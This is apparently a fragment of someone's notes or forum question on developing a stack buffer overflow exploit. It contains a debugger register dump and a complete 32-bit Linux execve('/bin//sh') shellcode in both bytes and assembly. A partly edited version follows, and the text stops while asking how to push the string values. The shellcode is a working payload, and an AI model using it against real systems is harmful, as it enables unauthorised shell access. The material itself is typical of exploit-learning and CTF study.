Registers:
$eax   : 0xffffcb40  →  0x90904241
$ebx   : 0xffffcb60  →  0xf7fae5e0  →  0x00000000
$ecx   : 0xffffcb40  →  0x90904241
$edx   : 0xffffcb40  →  0x90904241
$esp   : 0xffffcb3c  →  0x080485cb  →  <execute+213> mov esp, ebx
$ebp   : 0xffffcb88  →  0xffffcf98  →  0x00000000
$esi   : 0xf7fad000  →  0x001e6d6c
$edi   : 0xf7fad000  →  0x001e6d6c
$eip   : 0xffffcb40  →  0x90904241

Normal shellcode:
                                // <_start>
    "\x31\xc9"                  // xor    %ecx,%ecx
    "\xf7\xe1"                  // mul    %ecx
    "\x51"                      // push   %ecx
    "\x68\x2f\x2f\x73\x68"      // push   $0x68732f2f "hs//"
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f "nib/"
    "\x89\xe3"                  // mov    %esp,%ebx
    "\xb0\x0b"                  // mov    $0xb,%al
    "\xcd\x80"                  // int    $0x80

xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 0xb
int 0x80

Modified:

"\x31\xc9" xor ecx
"\xf7\xe1" mul ecx
"\x51" push ecx
"\x90" nop
?
?
"\x89\xe3" mov ebx,esp
"\xb0\x0b" mov al,0xb
"\xcd\x80" int 0x80

Main issue: How to push those two values?

To get 0x68732f2f:

